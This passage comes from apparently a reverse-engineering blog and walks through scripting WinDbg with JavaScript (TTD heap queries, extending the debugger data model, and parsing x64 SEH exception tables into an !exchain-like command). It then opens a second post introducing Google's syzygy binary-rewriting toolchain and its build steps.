= [0x64] : [object Object]  - Free     - 0x21b5dcd0000    - 0x21b5dce4030    -         - 0x0    - EF:247        - F1:1D       - 0x1    =
= [0x276] : [object Object] - Alloc    - 0x21b5dcd0000    - 0x21b5dce4030    - 0x98    - 0x0    - E59:3A7       - E5A:8E      -        =
========================================================================================================================================

As expected, the entry 0x64 is our free operation and it also happens in between the two allocation operations we were seeing earlier - solved.

Pretty neat, huh?

It is nice to be able to ask the utility about a specific heap address, but it would be even nicer to have access to the whole heap activity that happened during the session; that is exactly what TTD.Data.Heap gives you:

0:000> dx @$HeapOps=@$cursession.TTD.Data.Heap()
...

0:000> dx @$HeapOps.Count()
@$HeapOps.Count() : 0x414

0:000> dx @$HeapOps[137]
@$HeapOps[137]                 : [object Object]
    Action           : Free
    Heap             : 0x21b5dcd0000
    Address          : 0x21b5dcee790
    Flags            : 0x0
    Result           : 0x1
    TimeStart        : 13A1:184 [Time Travel]
    TimeEnd          : 13A2:27 [Time Travel]

And of course, do not forget that all these collections are queryable. We can easily find all the heap operations that are neither an alloc nor a free with the below query:

0:000> dx @$NoFreeAlloc=@$HeapOps.Where(c => c.Action != "Free" && c.Action != "Alloc")
...

0:000> dx -g @$NoFreeAlloc
============================================================================================================
=                           = Action    = Heap             = Result          = (+) TimeStart = (+) TimeEnd =
============================================================================================================
= [0x382] : [object Object] - Lock      - 0x21b5dcd0000    - 0xb87f4e3001    - 1ADE:602      - 1ADF:14     =
= [0x386] : [object Object] - Unlock    - 0x21b5dcd0000    - 0xb87f4e3001    - 1AE0:64       - 1AE1:13     =
= [0x38d] : [object Object] - Lock      - 0x21b5dcd0000    - 0xb87f4e3001    - 1B38:661      - 1B39:14     =
= [0x391] : [object Object] - Unlock    - 0x21b5dcd0000    - 0xb87f4e3001    - 1B3A:64       - 1B3B:13     =
= [0x397] : [object Object] - Lock      - 0x21b5dcd0000    - 0xb87f4e3001    - 1BF0:5F4      - 1BF1:14     =
= [0x399] : [object Object] - Unlock    - 0x21b5dcd0000    - 0xb87f4e3001    - 1BF1:335      - 1C1E:13     =
...

Extend the data model

After consuming all the various features available in the data model, I am sure you guys are wondering how you can go and add your own node and extend it. In order to do this, you can use the API host.namedModelParent.

class host.namedModelParent

An object representing a modification of the object model of the debugger.
This links together a JavaScript class (or prototype) with a data model.
The JavaScript class (or prototype) becomes a parent data model (e.g.: similar to a prototype)
to the data model registered under the supplied name. 

An instance of this object can be returned in the array of records returned from
the initializeScript method.

Let's say we would like to add a node that is associated with a Process called DiaryOfAReverseEngineer which has the following properties:

  • DiaryOfAReverseEngineer
    • Foo - string
    • Bar - string
    • Add - function
    • Sub
      • SubBar - string
      • SubFoo - string

Step 1: Attach a node to the Process model

Using host.namedModelParent you get the opportunity to link a Javascript class to the model of your choice. The other thing to understand is that this feature is made to be used by extension (as opposed to imperative) scripts.

Extension and imperative scripts are basically the same, but they have different entry points: extensions use initializeScript (the .scriptload command invokes this entry point) and imperative scripts use invokeScript (the .scriptrun command invokes both initializeScript and invokeScript). The small difference is that in an extension script you are expected to return an array of registration objects if you want to modify the data model, which is exactly what we want to do.

Anyway, let's attach a node called DiaryOfAReverseEngineer to the Process model:

//extendmodel_1.js
"use strict";

class ProcessModelParent {
    get DiaryOfAReverseEngineer() {
        return 'hello from ' + this.Name;
    }
}

function initializeScript() {
    return [new host.namedModelParent(
        ProcessModelParent,
        'Debugger.Models.Process'
    )];
}

Once loaded you can go ahead and check that the node has been added:

0:000> dx @$curprocess
@$curprocess                 : PING.EXE [Switch To]
    Name             : PING.EXE
    Id               : 0x1cfc
    Threads         
    Modules         
    Environment     
    TTD             
    DiaryOfAReverseEngineer : hello from PING.EXE

One important thing to be aware of in the previous example is that the this pointer is effectively an instance of the data model you attached to. In our case it is an instance of the Process model and as a result you can access every property available on this node, like its Name for example.

Step 2: Add the first level to the node

What we want to do now is to have our top node expose two string properties and one function (we'll deal with Sub later). This is done by creating a new Javascript class that represents this level, and returning an instance of said class from the DiaryOfAReverseEngineer property. Simple enough, huh?

//extendmodel_2.js
"use strict";

class DiaryOfAReverseEngineer {
    constructor(Process) {
        this.process = Process;
    }

    get Foo() {
        return 'Foo from ' + this.process.Name;
    }

    get Bar() {
        return 'Bar from ' + this.process.Name;
    }

    Add(a, b) {
        return a + b;
    }
}

class ProcessModelParent {
    get DiaryOfAReverseEngineer() {
        return new DiaryOfAReverseEngineer(this);
    }
}

function initializeScript() {
    return [new host.namedModelParent(
        ProcessModelParent,
        'Debugger.Models.Process'
    )];
}

Which gives:

0:000> dx @$curprocess
@$curprocess                 : PING.EXE [Switch To]
    Name             : PING.EXE
    Id               : 0x1cfc
    Threads         
    Modules         
    Environment     
    TTD             
    DiaryOfAReverseEngineer : [object Object]

0:000> dx @$curprocess.DiaryOfAReverseEngineer
@$curprocess.DiaryOfAReverseEngineer                 : [object Object]
    process          : PING.EXE [Switch To]
    Foo              : Foo from PING.EXE
    Bar              : Bar from PING.EXE

From the previous dumps there are at least two things we can do better:

1) The DiaryOfAReverseEngineer node has a string representation of [object Object] which is not great. In order to fix that we can just define our own toString method and return what we want.

2) When displaying the DiaryOfAReverseEngineer node, it displays the instance property process where we keep a copy of the Process model we attached to. This might be something you want to hide from the user, as it has nothing to do with what this node is supposed to be about. To solve that, we just have to prefix the field name with __.

(If you are wondering why we do not see the method Add you can force dx to display it with the -v flag.)

After fixing the two above points, here is what we have:

// extendmodel_2_1.js
"use strict";

class DiaryOfAReverseEngineer {
    constructor(Process) {
        this.__process = Process;
    }

    get Foo() {
        return 'Foo from ' + this.__process.Name;
    }

    get Bar() {
        return 'Bar from ' + this.__process.Name;
    }

    Add(a, b) {
        return a + b;
    }

    toString() {
        return 'Diary of a reverse-engineer';
    }
}

class ProcessModelParent {
    get DiaryOfAReverseEngineer() {
        return new DiaryOfAReverseEngineer(this);
    }
}

function initializeScript() {
    return [new host.namedModelParent(
        ProcessModelParent,
        'Debugger.Models.Process'
    )];
}

And now if we display the Process model:

0:000> dx @$curprocess
@$curprocess                 : PING.EXE [Switch To]
    Name             : PING.EXE
    Id               : 0x1cfc
    Threads         
    Modules         
    Environment     
    TTD             
    DiaryOfAReverseEngineer : Diary of a reverse-engineer

0:000> dx @$curprocess.DiaryOfAReverseEngineer
@$curprocess.DiaryOfAReverseEngineer                 : Diary of a reverse-engineer
    Foo              : Foo from PING.EXE
    Bar              : Bar from PING.EXE

0:000> dx @$curprocess.DiaryOfAReverseEngineer.Add(1, 2)
@$curprocess.DiaryOfAReverseEngineer.Add(1, 2) : 0x3

Step 3: Adding another level and an iterable class

At this stage, I am pretty sure that you guys are starting to get the hang of it. In order to add a new level, you can just define yet another class, define a property in the DiaryOfAReverseEngineer class and return an instance of it. And that's basically it.

The last concept I wanted to touch on before moving on is how to make one of your data model classes iterable. Let's say you have a class called Attribute that stores a key and a value, and let's also say you have another class called Attributes that is an Attribute store. The thing is, you might have noticed that one class instance usually corresponds to a node with its own properties in the data model view. This is not great for our Attributes class, as it is basically an array of Attribute objects, meaning that we would end up displaying two copies of everything.

If you want the debugger to be able to iterate over your instance, you can define a *[Symbol.iterator]() method like this:

// Attributes iterable
class Attribute {
    constructor(Process, Name, Value) {
        this.__process = Process;
        this.Name = Name;
        this.Value = Value;
    }

    toString() {
        let S = 'Process: ' + this.__process.Name + ', ';
        S += 'Name: ' + this.Name + ', ';
        S += 'Value: ' + this.Value;
        return S;
    }
}

class Attributes {
    constructor() {
        this.__attrs = [];
    }

    push(Attr) {
        this.__attrs.push(Attr);
    }

    *[Symbol.iterator]() {
        for (let Attr of this.__attrs) {
            yield Attr;
        }
    }

    toString() {
        return 'Attributes';
    }
}

Now if we put it all together we have:

// extendmodel.js
"use strict";

class Attribute {
    constructor(Process, Name, Value) {
        this.__process = Process;
        this.Name = Name;
        this.Value = Value;
    }

    toString() {
        let S = 'Process: ' + this.__process.Name + ', ';
        S += 'Name: ' + this.Name + ', ';
        S += 'Value: ' + this.Value;
        return S;
    }
}

class Attributes {
    constructor() {
        this.__attrs = [];
    }

    push(Attr) {
        this.__attrs.push(Attr);
    }

    *[Symbol.iterator]() {
        for (let Attr of this.__attrs) {
            yield Attr;
        }
    }

    toString() {
        return 'Attributes';
    }
}

class Sub {
    constructor(Process) {
        this.__process = Process;
    }

    get SubFoo() {
        return 'SubFoo from ' + this.__process.Name;
    }

    get SubBar() {
        return 'SubBar from ' + this.__process.Name;
    }

    get Attributes() {
        let Attrs = new Attributes();
        Attrs.push(new Attribute(this.__process, 'attr0', 'value0'));
        Attrs.push(new Attribute(this.__process, 'attr1', 'value0'));
        return Attrs;
    }

    toString() {
        return 'Sub module';
    }
}

class DiaryOfAReverseEngineer {
    constructor(Process) {
        this.__process = Process;
    }

    get Foo() {
        return 'Foo from ' + this.__process.Name;
    }

    get Bar() {
        return 'Bar from ' + this.__process.Name;
    }

    Add(a, b) {
        return a + b;
    }

    get Sub() {
        return new Sub(this.__process);
    }

    toString() {
        return 'Diary of a reverse-engineer';
    }
}

class ProcessModelParent {
    get DiaryOfAReverseEngineer() {
        return new DiaryOfAReverseEngineer(this);
    }
}

function initializeScript() {
    return [new host.namedModelParent(
        ProcessModelParent,
        'Debugger.Models.Process'
    )];
}

And we can play with the node in the model:

0:000> dx @$curprocess
@$curprocess                 : PING.EXE [Switch To]
    Name             : PING.EXE
    Id               : 0x1cfc
    Threads         
    Modules         
    Environment     
    TTD             
    DiaryOfAReverseEngineer : Diary of a reverse-engineer

0:000> dx @$curprocess.DiaryOfAReverseEngineer
@$curprocess.DiaryOfAReverseEngineer                 : Diary of a reverse-engineer
    Foo              : Foo from PING.EXE
    Bar              : Bar from PING.EXE
    Sub              : Sub module

0:000> dx @$curprocess.DiaryOfAReverseEngineer.Sub
@$curprocess.DiaryOfAReverseEngineer.Sub                 : Sub module
    SubFoo           : SubFoo from PING.EXE
    SubBar           : SubBar from PING.EXE
    Attributes       : Attributes

0:000> dx @$curprocess.DiaryOfAReverseEngineer.Sub.Attributes
@$curprocess.DiaryOfAReverseEngineer.Sub.Attributes                 : Attributes
    [0x0]            : Process: PING.EXE, Name: attr0, Value: value0
    [0x1]            : Process: PING.EXE, Name: attr1, Value: value0

0:000> dx @$curprocess.DiaryOfAReverseEngineer.Sub.Attributes[0]
@$curprocess.DiaryOfAReverseEngineer.Sub.Attributes[0]                 : Process: PING.EXE, Name: attr0, Value: value0
    Name             : attr0
    Value            : value0

Another, simpler example is available in Determining process architecture with JavaScript and LINQ, where the author adds a node to the Process model that tells you the bitness the process is running with, either 64 or 32 bits.

If you want to extend the data model with best practices you should also have a look at Debugger Data Model Design Considerations which sort of lays down various guidelines.

Misc

In this section I will try to answer a bunch of other questions and share various tricks that have been useful for me - you might learn a thing or two!

Try and play with host.* API from the command window

One of the things that quickly bothered me at first was not being able to run my Javascript from the command window. Let's say you want to play with a host.* API: these are not directly accessible.

A way to work around that is to load a script and to use the @$scriptContents variable from where you can access the host object.

0:000> dx -v @$scriptContents.host
@$scriptContents.host                 : [object Object]
    currentApiVersionSupported : [object Object]
    currentApiVersionInitialized : [object Object]
    diagnostics      : [object Object]
    metadata         : [object Object]
    typeSignatureRegistration
    typeSignatureExtension
    namedModelRegistration
    namedModelParent
    functionAlias   
    namespacePropertyParent
    optionalRecord  
    apiVersionSupport
    Int64           
    parseInt64      
    namespace       
    evaluateExpression
    evaluateExpressionInContext
    getModuleSymbol 
    getModuleSymbolAddress
    setModuleSymbol 
    getModuleType   
    createPointerObject
    createTypedObject
    indexedValue    
    getNamedModel   
    registerNamedModel
    unregisterNamedModel
    registerPrototypeForTypeSignature
    registerExtensionForTypeSignature
    unregisterPrototypeForTypeSignature
    unregisterExtensionForTypeSignature
    currentSession   : Time Travel Debugging Mode
    currentProcess   : PING.EXE [Switch To]
    currentThread    [Switch To]
    memory           : [object Object]
    typeSystem       : [object Object]
    ToDisplayString  [ToDisplayString([FormatSpecifier]) - Method which converts the object to its display string representation according to an optional format specifier]

Note that this is also super useful if you want to wander around and get a feel for the various features / APIs that have not been documented yet (or you were just not aware of).

How to load an extension script

The .scriptload command is available in both Windbg Preview and the Windbg from the SDK.
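
For example (the path is hypothetical):

0:000> .scriptload c:\foo\extendmodel.js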

How to run an imperative script

Similar to above, you can use the .scriptrun command for that.
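
Again with a hypothetical path:

0:000> .scriptrun c:\foo\script.js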

Is the Javascript engine only available in Windbg Preview?

Nope, it is not! You can load your Javascript scripts from the latest SDK's Windbg. You can use the .scriptproviders command to list the script providers currently loaded, and if you do not see the Javascript provider you can just run .load jsprovider.dll to load it.

0:003> .scriptproviders
Available Script Providers:
    NatVis (extension '.NatVis')

0:003> .load jsprovider.dll

0:003> .scriptproviders
Available Script Providers:
    NatVis (extension '.NatVis')
    JavaScript (extension '.js')

How to debug a script?

One thing I have not experimented with yet is the .scriptdebug command that lets you debug a script. This is a very important feature because, without it, it can be a bit of a pain to figure out what is going wrong and where. If you want to know more about this, please refer to Script Debugging Walkthrough from Andy Luhrs.

How to write a NatVis-style visualizer in Javascript?

I did not cover how to write custom visualizers in Javascript, but you should look at host.typeSignatureRegistration to register a class that is responsible for visualizing a type (the properties of the class become the visualizers for the type).
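
To give you an idea of the shape of such an extension, here is a minimal sketch (the Foo type, its module foomod, and its Value field are all made-up names):

//visualizer.js
"use strict";

class FooVisualizer {
    toString() {
        // 'this' behaves like an instance of the underlying Foo type,
        // so its fields are directly accessible.
        return 'Foo { Value: ' + this.Value + ' }';
    }
}

function initializeScript() {
    return [new host.typeSignatureRegistration(FooVisualizer, 'Foo', 'foomod')];
}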

Get a value out of a typed object

Sometimes you are accessing a Javascript object that behaves like a structure instance -- you can access its various fields seamlessly (e.g. you want to access the TEB through the EnvironmentBlock object). This is great. However, for various reasons you might need to get the raw value of a field (e.g. for doing arithmetic) and for that you can use the address property:

// address property
"use strict";

let logln = function (e) {
    host.diagnostics.debugLog(e + '\n');
}

function invokeScript() {
    let CurrentThread = host.currentThread;
    let TEB = CurrentThread.Environment.EnvironmentBlock;
    logln(TEB.FlsData);
    logln(TEB.FlsData.address);  
}

Which gives:

0:000>
[object Object]
2316561115408

0:000> dx @$curthread.Environment.EnvironmentBlock.FlsData
@$curthread.Environment.EnvironmentBlock.FlsData : 0x21b5dcd6910 [Type: void *]

Evaluate expressions

Another interesting function I wanted to mention is host.evaluateExpression. As the name suggests, it allows you to evaluate an expression; it is similar to using the dx operator, except that you can only use the language syntax (this means no ‘!’). Conversely, any expression you can evaluate through host.evaluateExpression, you can evaluate through dx. The neat thing about this is that the resulting expression keeps its type information, and as a result the Javascript object behaves like the type of the expression.

Here is a small example showing what I am trying to explain:

// host.evaluateExpression
"use strict";

let logln = function (e) {
    host.diagnostics.debugLog(e + '\n');
}

function invokeScript() {
    logln(host.evaluateExpression('(unsigned __int64)0'));
    logln(host.evaluateExpression('(unsigned __int64*)0'));
    logln(host.evaluateExpression('(_TEB*)0xb87f4e4000').FlsData);
    logln(host.evaluateExpression('(_TEB*)0xb87f4e4000').FlsData.address);
    try{
        logln(host.evaluateExpression('(unsigned __int64*)0').dereference());
    } catch(e) {
        logln(e);
    }
    // not valid: @$ is not part of the language - logln(host.evaluateExpression('@$teb'));
    // not valid: @rsp is not part of the language - logln(host.evaluateExpression('(unsigned __int64)@rsp'));
    // not valid: '!' is not part of the language - logln(host.evaluateExpression('((ntdll!_TEB*)0)'))
}

Resulting in:

0:000>
0
[object Object]
[object Object]
2316561115408
Error: Unable to read memory at Address 0x0

How to access global from modules

If you need access to a global in a specific module, you can use the host.getModuleSymbol function, which returns one of those magic Javascript objects behaving like a structure. You can check out an example in the following article: Implementation logic for the COM global interface table.
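
For instance, here is a minimal sketch grabbing the ntdll!PebLdr global (assuming you have symbols for ntdll; the choice of global is just for illustration):

//globals.js
"use strict";

let logln = function (e) {
    host.diagnostics.debugLog(e + '\n');
}

function invokeScript() {
    // Returns a typed object behaving like a _PEB_LDR_DATA structure.
    let PebLdr = host.getModuleSymbol('ntdll', 'PebLdr', '_PEB_LDR_DATA');
    logln('PebLdr.Length: ' + PebLdr.Length);
}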

x64 exception handling vs Javascript

Phew, you made it to the last part! This one is about trying to do something useful with all the little things we have learned throughout this article.

I am sure you all already know this, but Windows revisited how exception handling and frame unwinding work on its 64-bit operating systems. Once upon a time, the exception handlers could be found directly on the stack, where they formed some sort of linked list. Today, the compiler encodes every static exception handler at compile / link time into various tables embedded in the final binary image.

Anyway, you might know about Windbg's !exchain command that displays the current exception handler chain. This is what the output looks like:

(9a0.14d4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
except!Fault+0x3d:
00007ff7`a900179d 48c70001000000  mov     qword ptr [rax],1 ds:00000000`00000001=????????????????

0:000> !exchain
8 stack frames, scanning for handlers...
Frame 0x01: except!main+0x59 (00007ff7`a9001949)
    ehandler except!ILT+900(__GSHandlerCheck_SEH) (00007ff7`a9001389)
Frame 0x03: except!__scrt_common_main_seh+0x127 (00007ff7`a9002327)
    ehandler except!ILT+840(__C_specific_handler) (00007ff7`a900134d)
Frame 0x07: ntdll!RtlUserThreadStart+0x21 (00007ff8`3802efb1)
    ehandler ntdll!_C_specific_handler (00007ff8`38050ef0)

And here is the associated C code:

// except.c
__declspec(noinline) void Fault(uintptr_t *x) {
    printf("I'm about to fault!");
    *(uintptr_t*)x= 1;
}

int main(int argc, char **argv)
{
    __try {
        printf("Yo!\n");
        Fault((uintptr_t*)argc);
    }
    __except (Filter()) {
        printf("Exception!");
    }
    return EXIT_SUCCESS;
}

As you can see, it is not obvious from the dump above how to identify the Filter function and the __except code block.

I figured it would be a good exercise to parse those tables (at least partially) from Javascript, expose the information inside the data model, and write a command similar to !exchain - so let's do it.

A few words about ImageRuntimeFunctionEntries, UnwindInfos, SehScopeTables and CSpecificHandlerDatas

Before giving you the script, I would just like to spend a bit of time giving you a brief overview of how this information is encoded and embedded inside a PE32+ binary. Note that I am only interested in x64 binaries coded in C; in other words, I am focusing on SEH (__try / __except) as opposed to C++ EH (try / catch).

The first table we need to look at is the IMAGE_DIRECTORY_ENTRY_EXCEPTION table that resides in the DataDirectory of the OptionalHeader. This directory is an array of IMAGE_RUNTIME_FUNCTION_ENTRY structures that describe the boundaries of functions (handy for IDA!) and reference their unwinding information via an RVA stored at the end of the structure.
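
To make this concrete, here is a minimal sketch walking this directory by hand with the memory APIs we saw earlier (ModuleBase is assumed to be the Int64 base address of a loaded PE32+ image; the offsets are the standard PE32+ header layout):

//exceptiondir.js
"use strict";

let logln = function (e) {
    host.diagnostics.debugLog(e + '\n');
}

function read_u32(addr) {
    return host.memory.readMemoryValues(addr, 1, 4)[0];
}

function dumpRuntimeFunctions(ModuleBase) {
    let e_lfanew = read_u32(ModuleBase.add(0x3c));
    // DataDirectory[IMAGE_DIRECTORY_ENTRY_EXCEPTION] sits at offset 0x88 of
    // the PE32+ optional header, which starts 0x18 bytes into the NT headers.
    let ExcRva = read_u32(ModuleBase.add(e_lfanew + 0xa0));
    let ExcSize = read_u32(ModuleBase.add(e_lfanew + 0xa4));
    // Each IMAGE_RUNTIME_FUNCTION_ENTRY is three RVAs: Begin, End, UnwindInfo.
    for (let Offset = 0; Offset < ExcSize; Offset += 12) {
        let Entry = ModuleBase.add(ExcRva + Offset);
        logln('Begin: ' + read_u32(Entry).toString(16) +
              ', End: ' + read_u32(Entry.add(4)).toString(16) +
              ', UnwindInfo: ' + read_u32(Entry.add(8)).toString(16));
    }
}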

The unwinding information is mainly described by the UNWIND_INFO structure, in which the frame unwinder can find what is necessary to unwind a stack frame associated with this function. The array of UNWIND_CODE structures basically tells the unwinder how to undo the prologue (in effect, how to perform an epilogue).

What follows this array is variable though (documented here): if the Flags field of UNWIND_INFO specifies the UNW_FLAG_EHANDLER flag, then we have what I call a UNWIND_INFO_END structure defined like this:

0:000> dt UNWIND_INFO_END
    +0x000 ExceptionHandler : Uint4B
    +0x004 ExceptionData    : Uint4B

This is basically where !exchain stops -- the ehandler address in the output is the ExceptionHandler field. It is an RVA to a function that encapsulates the exception handling for this function. This is not to be confused with either your Filter function or your __except block; this is a generic entry point that the compiler generates, and it can be shared by other functions too. This function is invoked by the exception dispatching / handling code with an argument that is the value of ExceptionData. ExceptionData is an RVA to a blob of memory that the ExceptionHandler function knows how to read and act on. This is where the information we are after is stored.

This is also where it got a bit surprising to me, as you basically cannot tell for sure what type of structure is referenced by ExceptionData. For that, you would have to analyze the ExceptionHandler function to understand what this data is and how it is used. That is also, most likely, why the !exchain command stops here and does not bother trying to parse the exception data blob.

Obviously, we can simply assume that ExceptionData is the structure we would like it to be, and verify that it looks right. In practice, the fact that the code you are looking at has most likely been emitted by a well-behaved compiler, and that the binary has not been tampered with, has given me good enough results. But keep in mind that, in theory, you could place your own handler function and use your own ExceptionData format, in which case reverse engineering the handler would be mandatory; in practice this is an unlikely scenario if you are dealing with normal binaries.

The type of ExceptionData that we are interested in is what I call a SEH_SCOPE_TABLE which is an array of SCOPE_RECORDs that are defined like this:

0:000> dt SEH_SCOPE_TABLE
    +0x000 Count            : Uint4B
    +0x004 ScopeRecord      : [1] SCOPE_RECORD

0:000> dt SCOPE_RECORD
    +0x000 BeginAddress     : Uint4B
    +0x004 EndAddress       : Uint4B
    +0x008 HandlerAddress   : Uint4B
    +0x00c JumpTarget       : Uint4B

BeginAddress and EndAddress give you the __try block RVAs, and HandlerAddress encodes either the Filter function or the start of the __finally block. The JumpTarget field tells you whether you are looking at a __try / __except or a __try / __finally. Also, the current heuristic I use to decide whether a SCOPE_RECORD looks legit is to ensure that the __try block resides within the boundaries of the function the handler is defined in. This has worked well so far, at least on the binaries I have tried it on, but I would not be that surprised if there exist some edge cases; if you know any, feel free to hit me up!
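
Here is a minimal sketch of that parsing (assuming ModuleBase and ExceptionDataRva have already been mined from the UNWIND_INFO as described above; the real, complete logic lives in the script linked below):

//scopetable.js
"use strict";

let logln = function (e) {
    host.diagnostics.debugLog(e + '\n');
}

function read_u32(addr) {
    return host.memory.readMemoryValues(addr, 1, 4)[0];
}

function dumpScopeTable(ModuleBase, ExceptionDataRva) {
    let Table = ModuleBase.add(ExceptionDataRva);
    let Count = read_u32(Table);
    for (let Idx = 0; Idx < Count; Idx++) {
        // A SCOPE_RECORD is four Uint4B fields: Begin, End, Handler, JumpTarget.
        let Record = Table.add(4 + Idx * 16);
        let Begin = ModuleBase.add(read_u32(Record));
        let End = ModuleBase.add(read_u32(Record.add(4)));
        let Handler = ModuleBase.add(read_u32(Record.add(8)));
        let JumpTarget = read_u32(Record.add(12));
        let Kind = JumpTarget == 0 ? '__finally' : 'Filter';
        logln('__try {' + Begin.toString(16) + ' -> ' + End.toString(16) +
              '} ' + Kind + ': ' + Handler.toString(16));
    }
}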

Putting it all together

All right, so now that we sort of know how to dig out the information we are interested in, you can check the script I came up with: parse_eh_win64.js.

This extends both the Process and the Module models. To each of those models it adds a Functions node as well as an ExceptionHandlers node. Each node under Functions has an ExceptionHandlers node too.

This basically means that you can now:

  • Get every exception handler registered in the process regardless of which module it is coming from (using Process.ExceptionHandlers)
  • Get every exception handler registered by a specific module (using Module.ExceptionHandlers)
  • Get every function in the process address space (using Process.Functions)
  • Get every function in a specific module (using Module.Functions)
  • Get every exception handler defined by a specific function (using either Module.Functions[x].ExceptionHandlers or Process.Functions[x].ExceptionHandlers)

With the same source of information, we can easily filter and shape the way we want it displayed through the data model. There is no need to display every exception handler in the process from the Module node, as that information is not related to the Module; this is why we choose to filter it and display only the handlers concerning this Module. The same reasoning applies to Functions. The model is something you should explore step by step; it is not something where all the available information is displayed at once - it is meant to be scoped and not overwhelming.

And just in case you forgot about it, all this information is now accessible from the command window for query purposes. You can ask things like Which function defines the most exception handlers? very easily:

0:000> dx @$curprocess.Functions.OrderByDescending(c => c.ExceptionHandlers.Count()).First()
@$curprocess.Functions.OrderByDescending(c => c.ExceptionHandlers.Count()).First()                 : RVA:0x7ff83563e170 -> RVA:0x7ff83563e5a2, 12 exception handlers
    EHHandlerRVA     : 0x221d6
    EHHandler        : 0x7ff8356021d6
    BeginRVA         : 0x5e170
    EndRVA           : 0x5e5a2
    Begin            : 0x7ff83563e170
    End              : 0x7ff83563e5a2
    ExceptionHandlers :   __try {0x7ff83563e1d2 -> 0x7ff83563e37a} __finally {0x7ff83563e5a2}...

0:000> u 0x7ff83563e170 l1
KERNEL32!LoadModule:
00007ff8`3563e170 4053            push    rbx

In this example, the function KERNEL32!LoadModule seems to be the function that has registered the largest number of exception handlers (12 of them).

Now that we have this new source of information, we can also push it a bit further and implement a command that does a very similar job to !exchain, just by mining information from the nodes we added to the data model:

0:000> !ehhandlers
9 stack frames, scanning for handlers...
Frame 0x1: EHHandler: 0x7ff7a9001389: except!ILT+900(__GSHandlerCheck_SEH):
                Except: 0x7ff7a900194b: except!main+0x5b [c:\users\over\documents\blog\except\except\except.c @ 28]:
                Filter: 0x7ff7a9007e60: except!main$filt$0 [c:\users\over\documents\blog\except\except\except.c @ 27]:
Frame 0x3: EHHandler: 0x7ff7a900134d: except!ILT+840(__C_specific_handler):
                Except: 0x7ff7a900235d: except!__scrt_common_main_seh+0x15d [f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl @ 299]:
                Filter: 0x7ff7a9007ef0: except!`__scrt_common_main_seh'::`1'::filt$0 [f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl @ 299]:
Frame 0x7: EHHandler: 0x7ff838050ef0: ntdll!_C_specific_handler:
                Except: 0x7ff83802efc7: ntdll!RtlUserThreadStart+0x37:
                Filter: 0x7ff8380684d0: ntdll!RtlUserThreadStart$filt$0:
@$ehhandlers()  

0:000> !exchain
8 stack frames, scanning for handlers...
Frame 0x01: except!main+0x59 (00007ff7`a9001949)
    ehandler except!ILT+900(__GSHandlerCheck_SEH) (00007ff7`a9001389)
Frame 0x03: except!__scrt_common_main_seh+0x127 (00007ff7`a9002327)
    ehandler except!ILT+840(__C_specific_handler) (00007ff7`a900134d)
Frame 0x07: ntdll!RtlUserThreadStart+0x21 (00007ff8`3802efb1)
    ehandler ntdll!_C_specific_handler (00007ff8`38050ef0)

We could even push it a bit more and have our command return structured data instead of displaying text, so that other commands and extensions could build on top of it.

EOF

Wow, sounds like you made it to the end :-) I hope you enjoyed the post and ideally it will allow you to start scripting Windbg with Javascript pretty quickly. I hope to see more people coming up with new scripts and/or tools based on the various technologies I touched on today. As usual, big thanks to my buddy yrp604 for proofreading and edits.

If you are still thirsty for more information, here is a collection of links you should probably check out:

Binary rewriting with syzygy, Pt. I

Introduction

Binary instrumentation and analysis are subjects I have always found fascinating, whether at compile time via clang, or at runtime with dynamic binary instrumentation frameworks like Pin or DynamoRIO. One thing I have always looked for, though, is a framework able to statically instrument a PE image: a framework designed a bit like clang, where you can write 'passes' doing various things: transformation of the image, analysis of code blocks, etc. Until a couple of months ago, I wasn't aware of any public and robust project providing this capability (as in, able to instrument real-world scale programs like Chrome or similar).

In this post (it's been a while, I know!), I'll introduce the syzygy transformation tool chain with a focus on its instrumenter, give an overview of the framework, its capabilities and its limitations, and show how you can write transformations yourself. I'll walk through two simple examples: an analysis pass generating a call-graph, and a transformation pass rewriting the function __report_gsfailure in /GS protected binaries.

Syzygy

Introduction and a little bit of History

syzygy is a project written by Google, labeled as a "transformation tool chain". It encompasses a suite of utilities: instrument.exe is the application invoking the various transformation passes and applying them to a binary, grinder.exe, reorder.exe, etc. In a nutshell, the framework is able to (non-exhaustive list):

  • Read and write PDB files,
  • 'Decompose' PE32 binaries built with MSVC (with the help of full PDB symbols),
  • Assemble Intel x86 32-bit code,
  • Disassemble Intel x86 32-bit code (via Distorm),
  • 'Relink' an instrumented binary.

You also may have briefly heard about the project a while back in this post from May 2013 on Chromium's blog: Testing Chromium: SyzyASAN, a lightweight heap error detector. As I am sure you all know, AddressSanitizer is a compile-time instrumentation whose purpose is to detect memory errors in C/C++ programs. Long story short, AddressSanitizer tracks the state of your program's memory and instruments memory operations (read / write / heap allocation / heap free) at runtime to make sure they are 'safe'. For example, in a normal situation, an off-by-one out-of-bounds read on a statically sized stack buffer will most likely not result in a crash. AddressSanitizer's job is to detect this issue and report it to the user.

Currently there is no real equivalent on Windows platforms. The only supported available technology that can help with detecting memory errors is the Page Heap. Even though today clang for Windows works (Chrome announced that Windows builds of Chrome now use clang), this was not the case back in 2013. As a result, Google built SyzyASAN, a transformation aiming at detecting memory errors in PE32 binaries. This transform is built on top of the syzygy framework, and you can instrument your binary with it via the instrument.exe tool. One consequence of the above is that the framework has to be robust and accurate enough to instrument Chrome; as a result the code is heavily tested, which is awesome for us (it is also nearly the only documentation available 0:-))!

Compiling

In order to get a development environment setup you need to follow specific steps to get all the chromium build/dev tools installed. depot_tools is the name of the package containing everything you need to properly build the various chromium projects; it includes things like Python, GYP, Ninja, git, etc.

Once depot_tools is installed, it is just a matter of executing the below commands for getting the code and compiling it:

> set PATH=D:\Codes\depot_tools;%PATH%
> mkdir syzygy
> cd syzygy
> fetch syzygy
> cd syzygy\src
> ninja -C out\Release instrument

If you would like more information on the matter, I suggest you read this wiki page: SyzygyDevelopmentGuide.

Terminology

